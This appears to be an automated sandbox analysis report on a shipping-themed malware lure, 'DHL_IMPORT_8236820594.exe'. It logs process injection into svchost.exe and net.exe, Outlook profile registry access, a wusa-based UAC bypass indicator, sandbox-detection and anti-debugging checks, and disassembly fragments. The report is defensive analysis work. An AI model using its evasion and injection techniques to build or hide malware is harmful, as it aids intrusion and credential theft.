                Source: C:\Windows\SysWOW64\net.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\net.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: DHL_IMPORT_8236820594.exeStatic file information: File size 1632256 > 1048576
                Source: DHL_IMPORT_8236820594.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: DHL_IMPORT_8236820594.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: DHL_IMPORT_8236820594.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: DHL_IMPORT_8236820594.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: DHL_IMPORT_8236820594.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: DHL_IMPORT_8236820594.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: DHL_IMPORT_8236820594.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: wusa.pdbGCTL source: AUHJGnjYgKTjWw.exe, 00000005.00000003.2034581545.0000000000BBB000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: net.pdbUGP source: svchost.exe, 00000002.00000003.2065035000.000000000323B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2064660770.000000000321A000.00000004.00000020.00020000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000005.00000002.3517989845.0000000000C68000.00000004.00000001.00020000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000005.00000003.2034900857.0000000000C5D000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: wusa.pdb source: AUHJGnjYgKTjWw.exe, 00000005.00000003.2034581545.0000000000BBB000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: AUHJGnjYgKTjWw.exe, 00000005.00000000.2012569159.000000000073E000.00000002.00000001.01000000.00000005.sdmp, AUHJGnjYgKTjWw.exe, 00000009.00000002.3517387666.000000000073E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: DHL_IMPORT_8236820594.exe, 00000000.00000003.1836622224.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, DHL_IMPORT_8236820594.exe, 00000000.00000003.1840438960.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2108190018.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2108190018.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1992925679.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1994300850.0000000003700000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000002.3518629884.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000007.00000003.2129162021.0000000002CFE000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000003.2126611364.0000000002B4F000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000002.3518629884.000000000304E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: DHL_IMPORT_8236820594.exe, 00000000.00000003.1836622224.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, DHL_IMPORT_8236820594.exe, 00000000.00000003.1840438960.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2108190018.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2108190018.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1992925679.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1994300850.0000000003700000.00000004.00000020.00020000.00000000.sdmp, net.exe, net.exe, 00000007.00000002.3518629884.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000007.00000003.2129162021.0000000002CFE000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000003.2126611364.0000000002B4F000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000002.3518629884.000000000304E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: net.exe, 00000007.00000002.3517458773.0000000000692000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000002.3519002309.00000000034DC000.00000004.10000000.00040000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000009.00000000.2197878687.0000000002B8C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2418472075.000000001FBCC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: net.exe, 00000007.00000002.3517458773.0000000000692000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000002.3519002309.00000000034DC000.00000004.10000000.00040000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000009.00000000.2197878687.0000000002B8C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2418472075.000000001FBCC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: net.pdb source: svchost.exe, 00000002.00000003.2065035000.000000000323B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2064660770.000000000321A000.00000004.00000020.00020000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000005.00000002.3517989845.0000000000C68000.00000004.00000001.00020000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000005.00000003.2034900857.0000000000C5D000.00000004.00000001.00020000.00000000.sdmp
                Source: DHL_IMPORT_8236820594.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: DHL_IMPORT_8236820594.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: DHL_IMPORT_8236820594.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: DHL_IMPORT_8236820594.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: DHL_IMPORT_8236820594.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_007D42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_007D42DE
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_007F0A76 push ecx; ret 0_2_007F0A89
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00415037 push 00000010h; retf 2_2_0041503D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004189FB push cs; ret 2_2_00418A05
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004183FA pushfd ; ret 2_2_0041841B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040EC3C push esp; retf 2_2_0040EC3E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040BC9A push ebp; iretd 2_2_0040BC9B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403530 push eax; ret 2_2_00403532
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D60D push ds; iretd 2_2_0040D61A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00411EFC push ecx; iretd 2_2_00411F0D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00411F5A push ecx; iretd 2_2_00411F0D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040177A push esp; ret 2_2_0040174E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040171C push esp; ret 2_2_0040174E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004017AF push esp; ret 2_2_004017CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0390225F pushad ; ret 2_2_039027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039027FA pushad ; ret 2_2_039027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039309AD push ecx; mov dword ptr [esp], ecx2_2_039309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0390283D push eax; iretd 2_2_03902858
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03901368 push eax; iretd 2_2_03901369
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeCode function: 5_2_03F14B5F push cs; ret 5_2_03F14B69
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeCode function: 5_2_03F1119B push 00000010h; retf 5_2_03F111A1
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeCode function: 5_2_03F0E0BE push ecx; iretd 5_2_03F0E071
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeCode function: 5_2_03F0E060 push ecx; iretd 5_2_03F0E071
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeCode function: 5_2_03F09771 push ds; iretd 5_2_03F0977E
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeCode function: 5_2_03F07DFE push ebp; iretd 5_2_03F07DFF
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeCode function: 5_2_03F0ADA0 push esp; retf 5_2_03F0ADA2
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeCode function: 5_2_03F1455E pushfd ; ret 5_2_03F1457F
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02EB225F pushad ; ret 7_2_02EB27F9
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02EB27FA pushad ; ret 7_2_02EB27F9
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02EB283D push eax; iretd 7_2_02EB2858
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02EE09AD push ecx; mov dword ptr [esp], ecx7_2_02EE09B6
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02EB1368 push eax; iretd 7_2_02EB1369

                Persistence and Installation Behavior

                barindex
                Windows Update Standalone Installer command line found (may be used to bypass UAC)
                Source: AUHJGnjYgKTjWw.exe, 00000005.00000003.2034581545.0000000000BBB000.00000004.00000001.00020000.00000000.sdmpMemory string: DWS;zWusaHiddenFailed to allocate and initialize Administrators group SID.WusaIsUserAdminFailed to check token membership.Failed to get message text for id %uWusaLoadMessageWusaMessageBoxFailed: TaskDialog()Failed to get message for error 0x%xWusaGetErrorMessageWusaCreateLockFileFailed to allocate memory for lock file path.Failed to create lock file %SFailed: GetFullPathName() failed for %SWusaGetFullPathNameFailed to allocate memory for full path.Failed to create extract job for location: %SWusaExtractAllFilesFromCabinetFailed to add container for cabinet: %SFailed: ExtractAllFiles()Failed to extract files from cabinet %SFailed: LookupPrivilegeValue()EnablePrivilegeFailed: OpenProcessToken()Failed: AdjustTokenPrivileges()Failed: AdjustTokenPrivileges(); not all token privileges were assignedFailed: GetTokenInformation()WusaGetUserSIDFailed: CopySid()Failed to PostMessage to progress window, error code %uWusaPostMessagewusa.lockFailed to create eventAppModule::InitFailed to initialize COM securityFailed to initialize critical sectionFailed to show welcome dialogFailed to show non administrator dialogUser is not a member of the Administrators group.Failed to show multiple instance dialogError: Another instance of wusa.exe is running.Failed to create sandboxCreated sandbox %lsFailed: AppModule::SetScanCabPath()Failed to get application title text, id %uFailed to allocate BSTR for application titleFailure returned by InitCommonControlsEx()Failure returned by CreateFont()Failed to get STR_EXPAND_START textFailed to get STR_EXPAND_START_UNINSTALL textFailed to get STR_SEARCH_START textFailed to get STR_COPY_START textFailed to get STR_UNINSTALL_START textFailed to set done event to release shutdown blockAppModule::UninitDeleting sandbox %SAppModule::DeleteSandBoxFailed to delete sandboxCommandLineToArgvW() failed.AppModule::ParseCommandLineError: Too few arguments.Failed to get command line length.Failed to allocate memory for ignored arguments.Failed. Restart mode was supplied multiple times30Failed to parse switchFailed. /warnrestart has invalid formatFailed. /kb was supplied multiple timesFailed. /kb has invalid formatKBFailed to prefix KB numberFailed. /log was supplied multiple timesFailed. /gpmode was supplied multiple timesFailed. /gpmode has invalid formatFailed to allocate memory for product codeFailed to set product code to %lsFailed to add an argument to the ignored list Failed to add a blank space to the ignored argument listUnrecognized argument %SFailed to get MSU file nameFailed to get MSU file name or KB numberFailed: /uninstall with /kb and /quiet options is not supportedFailed to show /extract not supported message boxFailed: /extract is not a supported optionCommand line is %lsFailed to get source lengthAppModule::CopyStringWithQuoteFailed to allocate temp buffer"%s"Failed to copy stringFailure returned by SystemParametersInfo()AppModule::CreateFontWFailure returned by CreateFontIndirectW()Failure returned by DeleteObject()Failure r
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_007EF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_007EF98E
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_00861C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00861C41
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Found API chain indicative of sandbox detection
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-95469
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeAPI/Special instruction interceptor: Address: 3ABD0B4
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E rdtsc 2_2_0397096E
                Source: C:\Windows\SysWOW64\net.exeWindow / User API: threadDelayed 1393Jump to behavior
                Source: C:\Windows\SysWOW64\net.exeWindow / User API: threadDelayed 8579Jump to behavior
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeAPI coverage: 3.6 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
                Source: C:\Windows\SysWOW64\net.exeAPI coverage: 2.7 %
                Source: C:\Windows\SysWOW64\net.exe TID: 3052Thread sleep count: 1393 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\net.exe TID: 3052Thread sleep time: -2786000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\net.exe TID: 3052Thread sleep count: 8579 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\net.exe TID: 3052Thread sleep time: -17158000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe TID: 5720Thread sleep time: -45000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe TID: 5720Thread sleep time: -33000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\net.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\net.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_008468EE FindFirstFileW,FindClose,0_2_008468EE
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_0084698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0084698F
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_0083D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0083D076
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_0083D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0083D3A9
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_00849642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00849642
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_0084979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0084979D
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_0083DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0083DBBE
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_00849B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00849B2B
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_00845C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00845C97
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_0049C980 FindFirstFileW,FindNextFileW,FindClose,7_2_0049C980
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_007D42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_007D42DE
                Source: AUHJGnjYgKTjWw.exe, 00000009.00000002.3518020101.0000000000D8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll;
                Source: firefox.exe, 0000000A.00000002.2419741532.0000010C9FACC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!
                Source: net.exe, 00000007.00000002.3517458773.0000000000692000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E rdtsc 2_2_0397096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417E73 LdrLoadDll,2_2_00417E73
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_0084EAA2 BlockInput,0_2_0084EAA2
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_00802622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00802622
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_007D42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_007D42DE
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_007F4CE8 mov eax, dword ptr fs:[00000030h]0_2_007F4CE8
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_03ABD380 mov eax, dword ptr fs:[00000030h]0_2_03ABD380
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_03ABD320 mov eax, dword ptr fs:[00000030h]0_2_03ABD320
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_03ABBD10 mov eax, dword ptr fs:[00000030h]0_2_03ABBD10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928397 mov eax, dword ptr fs:[00000030h]2_2_03928397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928397 mov eax, dword ptr fs:[00000030h]2_2_03928397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928397 mov eax, dword ptr fs:[00000030h]2_2_03928397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h]2_2_0392E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h]2_2_0392E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h]2_2_0392E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395438F mov eax, dword ptr fs:[00000030h]2_2_0395438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395438F mov eax, dword ptr fs:[00000030h]2_2_0395438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h]2_2_039DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h]2_2_039DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE3DB mov ecx, dword ptr fs:[00000030h]2_2_039DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h]2_2_039DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D43D4 mov eax, dword ptr fs:[00000030h]2_2_039D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D43D4 mov eax, dword ptr fs:[00000030h]2_2_039D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EC3CD mov eax, dword ptr fs:[00000030h]2_2_039EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]2_2_039383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]2_2_039383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]2_2_039383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]2_2_039383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B63C0 mov eax, dword ptr fs:[00000030h]2_2_039B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h]2_2_0394E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h]2_2_0394E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h]2_2_0394E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039663FF mov eax, dword ptr fs:[00000030h]2_2_039663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
